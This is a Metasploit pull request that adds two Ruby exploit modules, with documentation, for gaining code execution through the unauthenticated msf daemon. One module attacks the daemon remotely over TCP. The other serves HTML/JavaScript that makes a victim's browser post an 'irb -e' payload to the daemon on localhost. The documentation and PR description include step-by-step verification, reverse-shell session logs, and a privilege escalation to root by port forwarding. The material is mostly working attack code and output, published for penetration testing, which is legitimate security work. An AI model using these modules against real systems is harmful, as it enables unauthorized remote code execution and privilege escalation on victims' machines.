### PR TITLE
Module msfd rce (remote and through browser)

### DIFF
--- a/documentation/modules/exploit/multi/browser/msfd_rce_browser.md
+++ b/documentation/modules/exploit/multi/browser/msfd_rce_browser.md
@@ -1,0 +1,103 @@
+## Description
+
+This module connects to the Metasploit msf daemon and uses the ruby interpreter
+to achieve a shell. This module can be used when the vulnerable service is only
+listening on localhost and the attacker has not achieved a foothold on the
+machine. To achieve code execution, the data is sent from the victim's browser.
+To achieve this, the victim must visit the attacker's web site.
+
+## Vulnerable Application
+
+[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
+of providing remote access. The msf daemon provides no means of authentication
+and is therefore vulnerable against an attacker who has IP access to the daemon.
+In those cases where the daemon is listening on localhost, we take advantage of
+the fact that the victim's web browser has IP access to the daemon.
+
+Because the msfconsole-program is line-based, it is possible to successfully
+send commands through the HTTP-protocol. This module takes advantage of this by
+placing the msfconsole-command in the POST-data of a HTTP-request. Since these
+POST-requests are considered safe to send cross-domain, it is possible to send
+them from the attacker's web application and to localhost using the victim's
+browser.
+
+To start the vulnerable service, run:
+
+```
+$ msfd -f -q
+```
+
+This module has been tested on the following targets:
+
+* Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
+* Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and
+  Chrome)
+
+***NB!*** Exploitation on Windows had a higher degree of success, when the
+quiet-flag was sent to the msf daemon. On Linux, it made no difference.
+
+Source code and installers:
+
+  * [Source Code Repository](https://github.com/rapid7/metasploit-framework)
+  * [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use exploit/multi/browser/msfd_rce_browser`
+3. Do: `set REMOTE_IP [IP]` (default: `127.0.0.1`)
+4. Do: `set RPORT [PORT]` (default: `55554`)
+7. Do: `set PAYLOAD [PAYLOAD]`
+8. Do: `exploit`
+9. Do: Visit the listed URL from the victim's machine
+9. You should get a shell
+
+
+## Options
+
+Options unique for this module is described below.
+
+  **REMOTE_IP**
+
+  IP to target when running inside the victim's browser.
+
+  **REMOTE_PORT**
+
+  Remote port
+
+
+## Scenarios
+
+### Through the victim's browser
+
+ ```
+  msf5 > use exploit/multi/browser/msfd_rce_browser
+  msf5 exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
+  payload => ruby/shell_reverse_tcp
+  msf5 exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17
+  lhost => 192.168.0.17
+  msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443
+  lport => 443
+  msf5 exploit(multi/browser/msfd_rce_browser) > exploit 
+  [*] Exploit running as background job 0.
+
+  [-] Handler failed to bind to 192.168.0.17:443:-  -
+  [*] Started reverse TCP handler on 0.0.0.0:443 
+  msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
+  http://0.0.0.0:8080/J5ras6oYftFWW4
+  [*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4
+  [*] Server started.
+  ```
+
+Visit the web site listed in a browser on the victim's machine and you should
+get the output below.
+
+ ```
+  [*] 192.168.0.17     msfd_rce_browser - 192.168.0.17     msfd_rce_browser
+  Sending HTML...
+  [*] Command shell session 4 opened (172.17.0.2:443 -> 192.168.0.17:48376) at 2018-04-22 19:15:07 +0000
+  id
+  [*] exec: id
+
+  uid=0(root) gid=0(root) groups=0(root)
+ ```

--- a/documentation/modules/exploit/multi/browser/msfd_rce_browser.md
+++ b/documentation/modules/exploit/multi/browser/msfd_rce_browser.md
@@ -21,13 +21,8 @@ POST-requests are considered safe to send cross-domain, it is possible to send
 them from the attacker's web application and to localhost using the victim's
 browser.
 
-To start the vulnerable service, run:
-
-```
-$ msfd -f -q
-```
-
-This module has been tested on the following targets:
+All versions of Metasploit are affected by this module, however testing has only
+been performed on the following targets:
 
 * Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
 * Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and
@@ -43,13 +38,14 @@ Source code and installers:
 
 ## Verification Steps
 
-1. Start `msfconsole`
-2. Do: `use exploit/multi/browser/msfd_rce_browser`
-3. Do: `set REMOTE_IP [IP]` (default: `127.0.0.1`)
-4. Do: `set RPORT [PORT]` (default: `55554`)
-7. Do: `set PAYLOAD [PAYLOAD]`
-8. Do: `exploit`
-9. Do: Visit the listed URL from the victim's machine
+1. Start the vulnerable service `msfd -q -f`
+2. Start `msfconsole`
+3. Do: `use exploit/multi/browser/msfd_rce_browser`
+4. Do: `set REMOTE_IP [IP]` (default: `127.0.0.1`)
+5. Do: `set RPORT [PORT]` (default: `55554`)
+6. Do: `set PAYLOAD [PAYLOAD]`
+7. Do: `exploit`
+8. Do: Visit the listed URL from the victim's machine
 9. You should get a shell
 
 
@@ -63,7 +59,7 @@ Options unique for this module is described below.
 
   **REMOTE_PORT**
 
-  Remote port
+  Remote port the vulnerable service is running at, default is 55554.
 
 
 ## Scenarios

--- a/documentation/modules/exploit/multi/misc/msfd_rce_remote.md
+++ b/documentation/modules/exploit/multi/misc/msfd_rce_remote.md
@@ -1,0 +1,111 @@
+## Description
+
+This module connects to the Metasploit msf daemon and uses the ruby interpreter
+to achieve a shell. This module can target remote systems if the daemon is
+exposed on a remote interface or it can be used for privilege escalation when
+the attacker has a foothold. If used as privilege escalation, port forwarding
+must be set up.
+
+## Vulnerable Application
+
+[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
+of providing remote access. The msf daemon provides no means of authentication
+and is therefore vulnerable against an attacker who has IP access to the daemon.
+
+To start the vulnerable service, run:
+
+```
+$ msfd -f -q -a 0.0.0.0
+```
+
+
+This module has been tested successfully on the following targets:
+
+* Metasploit 5.0.0 on Ubuntu 16.04
+* Metasploit 4.16.51 on Windows 7
+
+Source code and installers:
+
+  * [Source Code Repository](https://github.com/rapid7/metasploit-framework)
+  * [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use exploit/multi/misc/msfd_rce_remote`
+3. Do: `set RHOST [IP]`
+4. Do: `set RPORT [PORT]` (default: `55554`)
+7. Do: `set PAYLOAD [PAYLOAD]`
+8. Do: `exploit`
+9. You should get a shell
+
+
+## Options
+
+  **RHOST**
+
+  Remote Host
+
+  **RPORT**
+
+  Remote port
+
+
+## Scenarios
+
+### Remote target
+
+  ```
+  msf5 > use exploit/multi/misc/msfd_rce_remote
+  msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 192.168.56.101
+  rhost => 192.168.56.101
+  msf5 exploit(multi/misc/msfd_rce_remote) > set payload ruby/shell_reverse_tcp
+  payload => ruby/shell_reverse_tcp
+  msf5 exploit(multi/misc/msfd_rce_remote) > set lhost 192.168.0.17
+  lhost => 192.168.0.17
+  msf5 exploit(multi/misc/msfd_rce_remote) > set lport 443
+  lport => 443
+  msf5 exploit(multi/misc/msfd_rce_remote) > exploit
+
+  [-] Handler failed to bind to 192.168.0.17:443:-  -
+  [*] Started reverse TCP handler on 0.0.0.0:443
+  [*] Command shell session 1 opened (172.17.0.2:443 -> 192.168.0.17:48152) at 2018-04-22 18:43:41 +0000
+
+  whoami
+  robin
+  ```
+
+
+### Local target - privilege escalation
+
+  ```
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > shell
+  Process 17366 created.
+  Channel 1 created.
+  netstat -lntup|grep 55554
+  (Not all processes could be identified, non-owned process info
+   will not be shown, you would have to be root to see it all.)
+  tcp        0      0 127.0.0.1:55554         0.0.0.0:*      LISTEN -
+  ps aux | grep msfd
+  root     17303  3.3 13.8 535168 283492 pts/18  Sl+  20:47   0:08 ruby ./msfd -f -q
+  ^C
+  Terminate channel 1? [y/N]  y
+  meterpreter > portfwd add -l 55554 -p 55554 -r 127.0.0.1
+  [*] Local TCP relay created: :55554 <-> 127.0.0.1:55554
+  meterpreter > background
+  [*] Backgrounding session 2...
+  msf5 > use exploit/multi/misc/msfd_rce_remote
+  msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 127.0.0.1
+  rhost => 127.0.0.1
+  msf5 exploit(multi/misc/msfd_rce_remote) > exploit
+
+  [-] Handler failed to bind to 192.168.0.17:443:-  -
+  [*] Started reverse TCP handler on 0.0.0.0:443
+  [*] Command shell session 3 opened (172.17.0.2:443 -> 192.168.0.17:48300) at 2018-04-22 18:55:19 +0000
+
+  id
+  uid=0(root) gid=0(root) groups=0(root)
+  ```
+

--- a/documentation/modules/exploit/multi/misc/msfd_rce_remote.md
+++ b/documentation/modules/exploit/multi/misc/msfd_rce_remote.md
@@ -12,14 +12,8 @@ must be set up.
 of providing remote access. The msf daemon provides no means of authentication
 and is therefore vulnerable against an attacker who has IP access to the daemon.
 
-To start the vulnerable service, run:
-
-```
-$ msfd -f -q -a 0.0.0.0
-```
-
-
-This module has been tested successfully on the following targets:
+All versions of Metasploit are affected by this module, however testing has only
+been performed on the following targets:
 
 * Metasploit 5.0.0 on Ubuntu 16.04
 * Metasploit 4.16.51 on Windows 7
@@ -31,13 +25,14 @@ Source code and installers:
 
 ## Verification Steps
 
-1. Start `msfconsole`
-2. Do: `use exploit/multi/misc/msfd_rce_remote`
-3. Do: `set RHOST [IP]`
-4. Do: `set RPORT [PORT]` (default: `55554`)
-7. Do: `set PAYLOAD [PAYLOAD]`
-8. Do: `exploit`
-9. You should get a shell
+1. Start the vulnerable service: `msfd -f -q -a 0.0.0.0`
+2. Start `msfconsole`
+3. Do: `use exploit/multi/misc/msfd_rce_remote`
+4. Do: `set RHOST [IP]`
+5. Do: `set RPORT [PORT]` (default: `55554`)
+6. Do: `set PAYLOAD [PAYLOAD]`
+7. Do: `exploit`
+8. You should get a shell
 
 
 ## Options
@@ -48,7 +43,7 @@ Source code and installers:
 
   **RPORT**
 
-  Remote port
+  Remote port the vulnerable service is running at, default is 55554.
 
 
 ## Scenarios

--- a/modules/exploits/multi/browser/msfd_rce_browser.rb
+++ b/modules/exploits/multi/browser/msfd_rce_browser.rb
@@ -19,8 +19,8 @@ class MetasploitModule < Msf::Exploit::Remote
       this module places the payload in the POST-data. These POST-requests
       can be sent cross-domain and can therefore be sent to localhost on the
       victim's machine. The msfconsole-command to execute code is 'rbi -e
-      "PAYLOAD"'.
-        },
+      "CODE"'.
+      },
       'License'        => BSD_LICENSE,
       'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
       'Platform'       => 'ruby',
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'DisableNops' =>  'True',
           'BadChars' => "\x22\x0a"
         },
-      'DisclosureDate' => 'Apr 11 2018',
+      'DisclosureDate' => 'Apr 11 2018',  # Vendor notification
       'DefaultTarget'  => 0))
 
       register_options([
@@ -60,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
 <body>
 <script>
 var #{var1} = new XMLHttpRequest();
-#{var1}.onreadystatechange = function() { if (#{var1}.readyState == 4) {console.log(#{var1}); } }
 #{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
 var #{var2} = String("#{shellcode}");
 #{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");

--- a/modules/exploits/multi/browser/msfd_rce_browser.rb
+++ b/modules/exploits/multi/browser/msfd_rce_browser.rb
@@ -1,0 +1,74 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Metasploit msfd Remote Code Execution',
+     'Description'    => %q{
+      Metasploit's msfd-service makes it possible to get a msfconsole-like
+      interface over a TCP socket. This module connects to the msfd-socket
+      through the victim's browser.
+
+      To execute msfconsole-commands in JavaScript from a web application,
+      this module places the payload in the POST-data. These POST-requests
+      can be sent cross-domain and can therefore be sent to localhost on the
+      victim's machine. The msfconsole-command to execute code is 'rbi -e
+      "PAYLOAD"'.
+        },
+      'License'        => BSD_LICENSE,
+      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
+      'Platform'       => 'ruby',
+      'Arch'           => ARCH_RUBY,
+      'Targets'        =>
+        [
+          [ 'Automatic', {}],
+        ],
+      'Payload'        =>
+        {
+          'Space' => 8192,  # Arbitrary limit
+          'DisableNops' =>  'True',
+          'BadChars' => "\x22\x0a"
+        },
+      'DisclosureDate' => 'Apr 11 2018',
+      'DefaultTarget'  => 0))
+
+      register_options([
+        OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
+        OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
+      ])
+  end
+
+  def exploit
+    super
+  end
+
+  def on_request_uri(cli, request)
+    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
+    sc = payload.encoded
+    shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
+    var1 = rand_text_alpha(rand(6..11))
+    var2 = rand_text_alpha(rand(6..11))
+    html =  <<-EOS
+<html>
+<head></head>
+<body>
+<script>
+var #{var1} = new XMLHttpRequest();
+#{var1}.onreadystatechange = function() { if (#{var1}.readyState == 4) {console.log(#{var1}); } }
+#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
+var #{var2} = String("#{shellcode}");
+#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
+</script>
+</body>
+</html>
+EOS
+    print_status("#{msg} Sending HTML...")
+    send_response(cli, html, { 'Content-Type' => 'text/html' })
+  end
+end

--- a/modules/exploits/multi/browser/msfd_rce_browser.rb
+++ b/modules/exploits/multi/browser/msfd_rce_browser.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Metasploit msfd Remote Code Execution',
+     'Name'           => 'Metasploit msfd Remote Code Execution via Browser',
      'Description'    => %q{
       Metasploit's msfd-service makes it possible to get a msfconsole-like
       interface over a TCP socket. This module connects to the msfd-socket
@@ -20,6 +20,10 @@ class MetasploitModule < Msf::Exploit::Remote
       can be sent cross-domain and can therefore be sent to localhost on the
       victim's machine. The msfconsole-command to execute code is 'rbi -e
       "CODE"'.
+
+      Exploitation when the browser is running on Windows is unreliable and
+      the exploit is only usable when IE is used and the quiet-flag has been
+      passed to msf-daemon.
       },
       'License'        => BSD_LICENSE,
       'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',

--- a/modules/exploits/multi/misc/msfd_rce_remote.rb
+++ b/modules/exploits/multi/misc/msfd_rce_remote.rb
@@ -1,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'MSFD remote socket',
+      'Description'    => %q{
+      Metasploit's msfd-service makes it possible to get a msfconsole-like
+      interface over a TCP socket. If this socket is accessible on a remote
+      interface, an attacker can execute commands.
+
+      If msfd is running with higher privileges than the current user, this
+      module can also be used for privilege escalation. In that case, port
+      forwarding on the compromised host can be used.
+
+      Code execution is achieved with the msfconsole command: irb -e 'CODE'.
+      },
+      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
+      'License'        => BSD_LICENSE,
+      'Platform'       => "ruby",
+      'Arch'           => ARCH_RUBY,
+      'Payload'        =>
+        {
+          'Space'    => 8192,   # Arbitrary limit
+          'BadChars' => "\x27\x0a", # Quote nece
+          'DisableNops' => true
+        },
+      'Targets'  =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 11 2018',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(55554)
+      ])
+  end
+
+  def check
+    connect
+    data = sock.get
+    if data.include?("msf")
+      disconnect
+      return Exploit::CheckCode::Appears
+    end
+    disconnect
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    connect
+    data = sock.get
+    sock.put "irb -e '" + payload.encoded + "'\n"
+    disconnect
+  end
+end

--- a/modules/exploits/multi/misc/msfd_rce_remote.rb
+++ b/modules/exploits/multi/misc/msfd_rce_remote.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     connect
-    data = sock.get_once
+    sock.get_once
     sock.put "irb -e '" + payload.encoded + "'\n"
     disconnect
   end

--- a/modules/exploits/multi/misc/msfd_rce_remote.rb
+++ b/modules/exploits/multi/misc/msfd_rce_remote.rb
@@ -10,15 +10,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'MSFD remote socket',
+      'Name'           => 'Metasploit msfd Remote Code Execution',
       'Description'    => %q{
       Metasploit's msfd-service makes it possible to get a msfconsole-like
       interface over a TCP socket. If this socket is accessible on a remote
-      interface, an attacker can execute commands.
+      interface, an attacker can execute commands on the victim's machine.
 
-      If msfd is running with higher privileges than the current user, this
-      module can also be used for privilege escalation. In that case, port
-      forwarding on the compromised host can be used.
+      If msfd is running with higher privileges than the current local user,
+      this module can also be used for privilege escalation. In that case,
+      port forwarding on the compromised host can be used.
 
       Code execution is achieved with the msfconsole command: irb -e 'CODE'.
       },
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Payload'        =>
         {
           'Space'    => 8192,   # Arbitrary limit
-          'BadChars' => "\x27\x0a", # Quote nece
+          'BadChars' => "\x27\x0a",
           'DisableNops' => true
         },
       'Targets'  =>
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'Automatic', { } ]
         ],
       'Privileged'     => false,
-      'DisclosureDate' => 'Apr 11 2018',
+      'DisclosureDate' => 'Apr 11 2018',  # Vendor notification
       'DefaultTarget'  => 0))
 
     register_options(
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     connect
-    data = sock.get
+    data = sock.get_once
     if data.include?("msf")
       disconnect
       return Exploit::CheckCode::Appears
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     connect
-    data = sock.get
+    data = sock.get_once
     sock.put "irb -e '" + payload.encoded + "'\n"
     disconnect
   end


### PR DESCRIPTION
This PR adds two modules for exploiting Metasploit's msf daemon. The Metasploit team was contacted privately first and they confirmed that this is not a vulnerability, but intended behavior. These two modules are dependent on [PR 9900](https://github.com/rapid7/metasploit-framework/pull/9900) and will not work without it.

This PR adds two modules because they target the same functionality, but through different methods. The first method can be used if the msfd-program is exposed on an external interface and the second method uses the victim's browser to send network requests to localhost.

## Verification

Verification step for module `msfd_rce_remote`
- [ ] Start vulnerable service on the victim's machine `msfd -q -f -a 0.0.0.0`
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/misc/msfd_rce_remote`
- [ ] `set rhost IP`
- [ ] `set rport PORT`
- [ ] `set payload ruby/shell_reverse_tcp`
- [ ] `set lhost IP`
- [ ] `set lport PORT`
- [ ] `exploit`
- [ ] A shell should be received.

The above module could also be used for privilege escalation, see steps in the documentation for how this can be done.

Verification step for module `msfd_rce_browser`
- [ ] Start vulnerable service on the victim's machine `msfd -q -f`
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/browser/msfd_rce_browser`
- [ ] `set remote_ip IP`
- [ ] `set remote_port PORT`
- [ ] `set payload ruby/shell_reverse_tcp`
- [ ] `set lhost IP`
- [ ] `set lport PORT`
- [ ] `exploit`
- [ ] Visit the listed URL on the victim's machine
- [ ] A shell should be received.

Both exploits have been tested and verified to work on Linux and Windows, but `msfd_rce_browser` is unreliable on Windows. The exploit rarely worked when Firefox or Chrome was used and only worked in IE when the `-q` flag was sent to msfd. On Linux I had no issues.